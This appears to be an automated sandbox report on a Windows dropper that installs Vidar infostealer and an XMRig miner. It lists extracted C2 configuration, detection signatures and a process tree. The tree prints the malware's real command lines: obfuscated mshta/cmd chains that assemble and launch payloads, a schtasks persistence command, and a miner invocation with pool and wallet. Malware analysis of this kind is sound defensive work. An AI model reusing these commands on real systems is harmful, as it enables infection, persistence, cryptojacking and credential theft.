Analysis

  • max time kernel
    154s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    08-11-2021 10:07

General

  • Target

    96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe

  • Size

    7.0MB

  • MD5

    42fff45c940c819040ca8920fbb405cc

  • SHA1

    753821199880873e232bbe95ab2beb4ad0b6797c

  • SHA256

    96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434

  • SHA512

    7943f9d50e11fae6e3bc1a2fdf05bf5a1a96e3366948157ae1067e4f7834f692f1d2a59cf7fe4ef13e773596ca5a0ad26d62bbd285412550c01d02c1d4f7a05f

Malware Config

Extracted

Family

vidar

Version

41.5

Botnet

933

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    933

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 12 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 57 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 24 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 6 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:880
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2740
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        2⤵
        • Enumerates connected drives
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:2468
        • C:\Windows\system32\MsiExec.exe
          C:\Windows\system32\MsiExec.exe -Embedding F824BB2E1C299971C04224A786A41589
          3⤵
          • Loads dropped DLL
          PID:768
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding ADC7050EB74D154EB6AD177B56C4A3D0
          3⤵
          • Loads dropped DLL
          PID:1708
    • C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
      "C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:764
      • C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
        "C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
      • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
        "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
        2⤵
        • Executes dropped EXE
        PID:828
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 724
          3⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2184
      • C:\Users\Admin\AppData\Local\Temp\inst2.exe
        "C:\Users\Admin\AppData\Local\Temp\inst2.exe"
        2⤵
        • Executes dropped EXE
        PID:544
      • C:\Users\Admin\AppData\Local\Temp\4.exe
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:824
      • C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
        "C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"
        2⤵
        • Executes dropped EXE
        PID:1392
      • C:\Users\Admin\AppData\Local\Temp\setup.exe
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Users\Admin\AppData\Local\Temp\is-E5TN8.tmp\setup.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-E5TN8.tmp\setup.tmp" /SL5="$60154,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1696
          • C:\Users\Admin\AppData\Local\Temp\setup.exe
            "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1948
            • C:\Users\Admin\AppData\Local\Temp\is-JI3HB.tmp\setup.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-JI3HB.tmp\setup.tmp" /SL5="$70154,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              PID:456
              • C:\Users\Admin\AppData\Local\Temp\is-TPK3V.tmp\postback.exe
                "C:\Users\Admin\AppData\Local\Temp\is-TPK3V.tmp\postback.exe" ss1
                6⤵
                • Executes dropped EXE
                PID:2800
              • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                6⤵
                • Executes dropped EXE
                PID:2812
              • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2856
                • C:\20a2a73c878c6f7c6f\Setup.exe
                  C:\20a2a73c878c6f7c6f\\Setup.exe /q /norestart /x86 /x64 /web
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2928
                  • C:\20a2a73c878c6f7c6f\SetupUtility.exe
                    SetupUtility.exe /screboot
                    8⤵
                    • Executes dropped EXE
                    PID:2224
      • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        2⤵
        • Executes dropped EXE
        PID:1020
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
          3⤵
          • Modifies Internet Explorer settings
          PID:1888
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
            4⤵
            • Loads dropped DLL
            PID:764
            • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
              ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
              5⤵
              • Executes dropped EXE
              PID:2244
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                6⤵
                • Modifies Internet Explorer settings
                PID:2456
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                  7⤵
                    PID:2556
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                  6⤵
                    PID:2948
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                      7⤵
                        PID:2988
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                          8⤵
                            PID:3020
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                            8⤵
                              PID:3032
                            • C:\Windows\SysWOW64\msiexec.exe
                              msiexec -Y ..\lXQ2g.WC
                              8⤵
                              • Loads dropped DLL
                              PID:1004
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill -f -iM "search_hyperfs_206.exe"
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2296
                • C:\Users\Admin\AppData\Local\Temp\8.exe
                  "C:\Users\Admin\AppData\Local\Temp\8.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1172
                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:2340
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im "LzmwAqmV.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" & exit
                      4⤵
                        PID:2620
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im "LzmwAqmV.exe" /f
                          5⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2660
                  • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                    "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Modifies system certificate store
                    PID:2020
                  • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
                    "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:628
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3052
                      • C:\Windows\System32\cmd.exe
                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                        4⤵
                          PID:2204
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                            5⤵
                            • Creates scheduled task(s)
                            PID:1736
                        • C:\Windows\System32\cmd.exe
                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                          4⤵
                          • Loads dropped DLL
                          PID:1816
                          • C:\Users\Admin\AppData\Roaming\services64.exe
                            C:\Users\Admin\AppData\Roaming\services64.exe
                            5⤵
                            • Executes dropped EXE
                            PID:1924
                            • C:\Windows\System32\conhost.exe
                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                              6⤵
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2396
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:2536
                                • C:\Windows\System32\conhost.exe
                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                  8⤵
                                    PID:276
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                  7⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2680
                      • C:\Users\Admin\AppData\Local\Temp\Jonba.exe
                        "C:\Users\Admin\AppData\Local\Temp\Jonba.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:912
                    • C:\Windows\system32\rundll32.exe
                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                      1⤵
                      • Process spawned unexpected child process
                      PID:2572
                      • C:\Windows\SysWOW64\rundll32.exe
                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                        2⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2668

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/276-261-0x000000001AD32000-0x000000001AD34000-memory.dmp

                      Filesize

                      8KB

                    • memory/276-264-0x000000001AD34000-0x000000001AD36000-memory.dmp

                      Filesize

                      8KB

                    • memory/276-260-0x0000000000060000-0x0000000000066000-memory.dmp

                      Filesize

                      24KB

                    • memory/276-265-0x000000001AD36000-0x000000001AD37000-memory.dmp

                      Filesize

                      4KB

                    • memory/276-266-0x000000001AD37000-0x000000001AD38000-memory.dmp

                      Filesize

                      4KB

                    • memory/276-262-0x0000000000180000-0x0000000000182000-memory.dmp

                      Filesize

                      8KB

                    • memory/456-149-0x0000000000240000-0x0000000000241000-memory.dmp

                      Filesize

                      4KB

                    • memory/544-70-0x0000000000080000-0x0000000000090000-memory.dmp

                      Filesize

                      64KB

                    • memory/544-71-0x00000000001F0000-0x0000000000202000-memory.dmp

                      Filesize

                      72KB

                    • memory/764-55-0x0000000000060000-0x0000000000061000-memory.dmp

                      Filesize

                      4KB

                    • memory/764-57-0x00000000768A1000-0x00000000768A3000-memory.dmp

                      Filesize

                      8KB

                    • memory/824-77-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

                      Filesize

                      4KB

                    • memory/824-133-0x0000000000A30000-0x0000000000A32000-memory.dmp

                      Filesize

                      8KB

                    • memory/828-92-0x0000000000400000-0x0000000002F74000-memory.dmp

                      Filesize

                      43.5MB

                    • memory/828-86-0x0000000000290000-0x000000000030C000-memory.dmp

                      Filesize

                      496KB

                    • memory/828-87-0x00000000047E0000-0x00000000048B6000-memory.dmp

                      Filesize

                      856KB

                    • memory/880-193-0x0000000001490000-0x0000000001502000-memory.dmp

                      Filesize

                      456KB

                    • memory/880-192-0x0000000000560000-0x00000000005AD000-memory.dmp

                      Filesize

                      308KB

                    • memory/912-151-0x0000000000990000-0x0000000000991000-memory.dmp

                      Filesize

                      4KB

                    • memory/912-115-0x00000000010E0000-0x00000000010E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1108-119-0x0000000000400000-0x0000000000414000-memory.dmp

                      Filesize

                      80KB

                    • memory/1172-132-0x000000001AB60000-0x000000001AB62000-memory.dmp

                      Filesize

                      8KB

                    • memory/1172-105-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1472-88-0x0000000000240000-0x0000000000241000-memory.dmp

                      Filesize

                      4KB

                    • memory/1472-118-0x000000001AE30000-0x000000001AE32000-memory.dmp

                      Filesize

                      8KB

                    • memory/1472-76-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1696-131-0x0000000000240000-0x0000000000241000-memory.dmp

                      Filesize

                      4KB

                    • memory/1948-148-0x0000000000400000-0x0000000000414000-memory.dmp

                      Filesize

                      80KB

                    • memory/2184-197-0x0000000000270000-0x0000000000271000-memory.dmp

                      Filesize

                      4KB

                    • memory/2340-181-0x0000000000250000-0x0000000000293000-memory.dmp

                      Filesize

                      268KB

                    • memory/2340-182-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/2340-180-0x0000000000220000-0x0000000000246000-memory.dmp

                      Filesize

                      152KB

                    • memory/2396-242-0x000000001B0B2000-0x000000001B0B4000-memory.dmp

                      Filesize

                      8KB

                    • memory/2396-243-0x000000001B0B4000-0x000000001B0B6000-memory.dmp

                      Filesize

                      8KB

                    • memory/2396-245-0x000000001B0B6000-0x000000001B0B7000-memory.dmp

                      Filesize

                      4KB

                    • memory/2396-246-0x000000001B0B7000-0x000000001B0B8000-memory.dmp

                      Filesize

                      4KB

                    • memory/2668-191-0x0000000000B10000-0x0000000000B6D000-memory.dmp

                      Filesize

                      372KB

                    • memory/2668-190-0x0000000000A00000-0x0000000000B01000-memory.dmp

                      Filesize

                      1.0MB

                    • memory/2680-254-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-252-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-259-0x00000000002D0000-0x00000000002F0000-memory.dmp

                      Filesize

                      128KB

                    • memory/2680-258-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-248-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-247-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-257-0x00000000000E0000-0x0000000000100000-memory.dmp

                      Filesize

                      128KB

                    • memory/2680-255-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-249-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-253-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-244-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-251-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-250-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-239-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-240-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2680-241-0x0000000140000000-0x0000000140786000-memory.dmp

                      Filesize

                      7.5MB

                    • memory/2740-194-0x0000000000480000-0x00000000004F2000-memory.dmp

                      Filesize

                      456KB

                    • memory/2740-188-0x0000000000060000-0x00000000000AD000-memory.dmp

                      Filesize

                      308KB

                    • memory/2740-222-0x0000000002FC0000-0x00000000030C5000-memory.dmp

                      Filesize

                      1.0MB

                    • memory/2740-221-0x0000000001C20000-0x0000000001C3B000-memory.dmp

                      Filesize

                      108KB

                    • memory/2800-199-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmp

                      Filesize

                      8KB

                    • memory/2812-223-0x00000000006D0000-0x00000000006D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2812-209-0x0000000000690000-0x0000000000691000-memory.dmp

                      Filesize

                      4KB

                    • memory/2812-198-0x0000000000860000-0x0000000000861000-memory.dmp

                      Filesize

                      4KB

                    • memory/2812-216-0x0000000000695000-0x00000000006A6000-memory.dmp

                      Filesize

                      68KB

                    • memory/3052-210-0x0000000000160000-0x0000000000380000-memory.dmp

                      Filesize

                      2.1MB

                    • memory/3052-217-0x000000001B207000-0x000000001B208000-memory.dmp

                      Filesize

                      4KB

                    • memory/3052-215-0x000000001B206000-0x000000001B207000-memory.dmp

                      Filesize

                      4KB

                    • memory/3052-214-0x000000001B204000-0x000000001B206000-memory.dmp

                      Filesize

                      8KB

                    • memory/3052-213-0x000000001B202000-0x000000001B204000-memory.dmp

                      Filesize

                      8KB

                    • memory/3052-211-0x000000001B4A0000-0x000000001B6BC000-memory.dmp

                      Filesize

                      2.1MB